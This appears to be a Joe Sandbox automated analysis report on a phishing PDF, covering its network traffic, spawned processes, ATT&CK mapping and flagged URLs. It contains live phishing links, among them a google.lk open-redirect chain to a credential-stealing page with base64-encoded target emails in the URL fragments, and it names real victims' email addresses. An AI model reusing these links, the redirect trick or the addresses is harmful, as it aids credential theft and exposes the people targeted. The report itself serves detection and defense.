        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
        Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49775 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49986 version: TLS 1.2
        Source: classification engineClassification label: mal72.phis.winPDF@30/69@23/10
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-03 11-49-25-002.logJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf"
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1640,i,14083476496902513719,8648232596601135647,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#c211cnBoeUBhbWVyaWNhbi11c2EuY29t
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2156,i,4777409756344785431,10372266608452722873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1640,i,14083476496902513719,8648232596601135647,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2156,i,4777409756344785431,10372266608452722873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JS count = 0
        Source: Employee_Important_Message.pdfInitial sample: PDF keyword /JavaScript count = 0
        Source: A918cryhe_1n1ntrl_5uo.tmp.0.drInitial sample: PDF keyword /JS count = 0
        Source: A918cryhe_1n1ntrl_5uo.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
        Source: Employee_Important_Message.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        System Information Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29t100%SlashNextCredential Stealing type: Phishing & Social Engineering
        https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html0%Avira URL Cloudsafe
        https://apnasofa.com/episode/script.js100%Avira URL Cloudmalware
        https://apnasofa.com/episode/index#100%Avira URL Cloudmalware
        https://apnasofa.com/episode/image/logo.png100%Avira URL Cloudmalware
        https://apnasofa.com/favicon.ico100%Avira URL Cloudmalware
        https://apnasofa.com/episode/style.css100%Avira URL Cloudmalware
        https://apnasofa.com/episode/index100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        ipwhois.app
        103.126.138.87
        truefalse
          high
          bg.microsoft.map.fastly.net
          199.232.214.172
          truefalse
            high
            www.google.lk
            172.217.17.35
            truefalse
              high
              google.lk
              142.250.181.67
              truefalse
                high
                www.google.com
                142.250.181.100
                truefalse
                  high
                  api.ipify.org
                  104.26.12.205
                  truefalse
                    high
                    apnasofa.com
                    103.160.107.138
                    truefalse
                      high
                      s3-r-w.us-east-1.amazonaws.com
                      16.182.106.106
                      truefalse
                        high
                        i--iy.s3.us-east-1.amazonaws.com
                        unknown
                        unknownfalse
                          high
                          x1.i.lencr.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://apnasofa.com/favicon.icofalse
                            • Avira URL Cloud: malware
                            unknown
                            https://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                              high
                              https://apnasofa.com/episode/script.jstrue
                              • Avira URL Cloud: malware
                              unknown
                              https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://ipwhois.app/json/8.46.123.228false
                                high
                                https://apnasofa.com/episode/image/logo.pngfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://apnasofa.com/episode/style.cssfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://api.ipify.org/?format=jsonfalse
                                  high
                                  https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                                    high
                                    https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29ttrue
                                    • SlashNext: Credential Stealing type: Phishing & Social Engineering
                                    unknown
                                    https://apnasofa.com/episode/indexfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://www.google.lk/url?q=smurphy@american-usa.com&american-usa.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                        high
                                        https://apnasofa.com/episode/index#chromecache_181.5.drfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        16.182.106.106
                                        s3-r-w.us-east-1.amazonaws.comUnited States
                                        unknownunknownfalse
                                        104.26.12.205
                                        api.ipify.orgUnited States
                                        13335CLOUDFLARENETUSfalse
                                        103.160.107.138
                                        apnasofa.comunknown
                                        7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                        172.217.17.35
                                        www.google.lkUnited States
                                        15169GOOGLEUSfalse
                                        142.250.181.100
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        142.250.181.67
                                        google.lkUnited States
                                        15169GOOGLEUSfalse
                                        103.126.138.87
                                        ipwhois.appUnited States
                                        40676AS40676USfalse
                                        IP
                                        192.168.2.4
                                        192.168.2.6
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1567650
                                        Start date and time:2024-12-03 17:48:31 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 29s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowspdfcookbook.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Employee_Important_Message.pdf
                                        Detection:MAL
                                        Classification:mal72.phis.winPDF@30/69@23/10
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .pdf
                                        • Found PDF document
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.217.21.35, 172.217.19.238, 74.125.205.84, 172.64.41.3, 162.159.61.3, 23.32.239.65, 23.32.239.56, 2.19.198.27, 23.32.239.9, 18.213.11.84, 50.16.47.176, 54.224.241.105, 34.237.241.83, 2.20.68.207, 2.20.68.228, 34.104.35.123, 23.195.39.65, 199.232.214.172, 2.20.40.170, 192.229.221.95, 216.58.208.234, 142.250.181.106, 172.217.19.170, 172.217.19.202, 172.217.17.74, 172.217.19.10, 142.250.181.74, 142.250.181.138, 172.217.17.42, 172.217.19.234, 172.217.17.67, 142.250.201.46
                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, edgedl.me.gvt1.com, armmf.adobe.com, clients.l.google.com, geo2.adobe.com
                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Employee_Important_Message.pdf
                                        TimeTypeDescription
                                        11:49:34API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                        SourceURL
                                        Screenshothttps://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#c211cnBoeUBhbWVyaWNhbi11c2EuY29t
                                        Screenshothttps://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#c211cnBoeUBhbWVyaWNhbi11c2EuY29t
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                        • api.ipify.org/
                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                        • api.ipify.org/
                                        perfcc.elfGet hashmaliciousXmrigBrowse
                                        • api.ipify.org/
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        file.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        103.160.107.138https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                            Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                              https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                  https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                    239.255.255.250https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82Get hashmaliciousUnknownBrowse
                                                      #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            https://temp.farenheit.net/XWU9WdXVLQ1BPcVcwN28vNmJmQW9rZy9JbGl2YjNqdU82UXRXbjVuRDE4WHZ2S3E3MTh0U0RLVVRZRjcvL3o0M1ZEZW5HMGQ2cUJ6Q1dmd0d6MzNsK1IwNkc0c1FQTlFkODFpdjI1RE5wTTZrZjNNL2ZlNTNzb3kvbXlTenlUOC94REZCNXJyYzEwcDduQ0JYM1JvQnpTTEhpdHIzWXlMVFh3dnJkNWo5N3JWODhWWVd4MWx5T0pqcUNZQlY3ZHRFTktEUGRLRVR4czR1dTMvY282WURmWGE0TkhiSkd2dkNZOUlGWUE9PS0tVVdmbHMzdlpZZDU2aFdnMy0teWdvSnFiVklFSk13UEoyUlNUQzd4Zz09?cid=2308276595Get hashmaliciousKnowBe4Browse
                                                              #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                    https://arul.top/01f3c0dpQXFEQ3l5SA1cBmsbOVh3DEM8Q2MgCVMxQxwwUwklUAoIEyISME4rEVI1JVQ1TkURCEBEeUo?_t1733230843322Get hashmaliciousPhisherBrowse
                                                                      #Ud83d#Ude0e.pdfGet hashmaliciousPorn ScamBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        api.ipify.orgv58HgfB8Af.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        zwW6sDt6hU.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                        • 104.26.12.205
                                                                        e7lGwhCp7r.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.12.205
                                                                        Svku9pKypu.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                        • 104.26.12.205
                                                                        pR65xo6sud.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 104.26.12.205
                                                                        uLFOeGZaJS.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        Ref#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 104.26.13.205
                                                                        ipwhois.apphttps://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        Employee_Secure_Doc.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29tGet hashmaliciousUnknownBrowse
                                                                        • 103.126.138.87
                                                                        d8EEfAi7tl.vbsGet hashmaliciousMoDiRATBrowse
                                                                        • 195.201.57.90
                                                                        ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                                        • 195.201.57.90
                                                                        SecuriteInfo.com.FileRepMalware.9397.20651.exeGet hashmaliciousUnknownBrowse
                                                                        • 15.204.213.5
                                                                        CbLQcrwzUi.exeGet hashmaliciousUnknownBrowse
                                                                        • 15.204.213.5
